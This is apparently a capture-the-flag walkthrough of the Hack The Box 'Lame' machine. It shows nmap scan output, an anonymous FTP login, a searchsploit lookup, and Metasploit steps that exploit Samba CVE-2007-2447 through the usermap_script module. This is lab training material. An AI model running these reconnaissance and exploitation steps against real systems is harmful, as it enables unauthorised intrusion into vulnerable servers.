Skip to content

Lame

Beginer Track Easy Internal Network SAMBA Penetration Tester Level 1 Remote Code Execution CVE-2007-2447 Public Vulnerabilities CVE Exploitation Security Tools

$ nmap -sV -sC -Pn --min-rate 5000 10.129.98.0
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 07:01 WIB
Nmap scan report for 10.129.98.0
Host is up (0.27s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.4
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2022-05-29T20:02:31-04:00
|_clock-skew: mean: 2h00m28s, deviation: 2h49m46s, median: 25s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.12 seconds

$ ftp 10.129.98.0
Connected to 10.129.98.0.
220 (vsFTPd 2.3.4)
Name (10.129.98.0:carloz): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
.
..
ftp> pwn
"/"
ftp>

it doesn't show anything, if we browse CVE-2007-2447 it says

The MS-RPC functionality in smbd in Samba 3.0.0 through 3.0.25rc3 allows remote attackers to execute arbitrary commands via shell metacharacters involving the (1) SamrChangePassword function, when the "username map script" smb.conf option is enabled, and allows remote authenticated users to execute commands via shell metacharacters involving other MS-RPC functions in the (2) remote printer and (3) file share management.

$ searchsploit 3.0.20
------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                      |  Path
------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
CubeCart 3.0.20 - '/admin/login.php?goto' Arbitrary Site Redirect                                                                   | php/webapps/36686.txt
CubeCart 3.0.20 - 'switch.php?r' Arbitrary Site Redirect                                                                            | php/webapps/36687.txt
CubeCart 3.0.20 - Multiple Script 'redir' Arbitrary Site Redirects                                                                  | php/webapps/36685.txt
Maxthon Browser 3.0.20.1000 - ref / replace Denial of Service                                                                       | windows/dos/16084.html
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)                                                    | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow                                                                                               | linux/remote/7701.txt
Spy Emergency 23.0.205 - Unquoted Service Path Privilege Escalation                                                                 | windows/local/40550.txt
------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

$ msfconsole

msf6 > search samba 3.0.20

Matching Modules
================

   #  Name                                Disclosure Date  Rank       Check  Description
   -  ----                                ---------------  ----       -----  -----------
   0  exploit/multi/samba/usermap_script  2007-05-14       excellent  No     Samba "username map script" Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script

msf6> use exploit/multi/samba/usermap_script
msf6 exploit(multi/samba/usermap_script) > show options
...
msf6 exploit(multi/samba/usermap_script) > set RHOSTS <target_ip>
...
msf6 exploit(multi/samba/usermap_script) > exploit

done